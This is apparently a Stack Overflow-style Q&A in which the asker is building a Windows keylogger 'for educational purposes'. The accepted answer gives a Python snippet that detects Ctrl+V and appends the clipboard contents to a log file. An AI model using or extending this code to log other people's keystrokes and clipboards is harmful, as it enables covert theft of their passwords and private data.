# How to catch ctrl+v?

Tags: python-2.7, clipboard, keylogger, ctrl

I am writing a keylogger (for educational purposes).

I am trying to copy what will be in the clipboard and write it to a file in case **Ctrl+V** is pressed. I found out that it's abbreviation is 'SYN' but I do not know what is it's ascii. I did manage to capture every keystrokes and write it to a file. When **Ctrl+V** keystroke occur what I get in my file is '**Lcontrol**' and the immediately after '**V**' so what I am guessing is that it catch them separately.

Comment: Can you post your solution as an answer instead of an edit to your question?

Answer (score 0, accepted):

This is the Solution:

```
...
import win32clipboard
from pyHook import HookManager, GetKeyState, HookConstants
...
if GetKeyState(HookConstants.VKeyToID('VK_CONTROL')) and HookConstants.IDToName(event.KeyID) == 'V':
        win32clipboard.OpenClipboard()
        data = win32clipboard.GetClipboardData()
        win32clipboard.CloseClipboard()
        with open(file, "a") as f:
            f.write("{Clipboard : " + data + "}")
...
```

Comment: While this code snippet may be the solution, [including an explanation](//meta.stackexchange.com/questions/114762/explaining-entirely-‌​code-based-answers) really helps to improve the quality of your post. Remember that you are answering the question for readers in the future, and those people might not know the reasons for your code suggestion.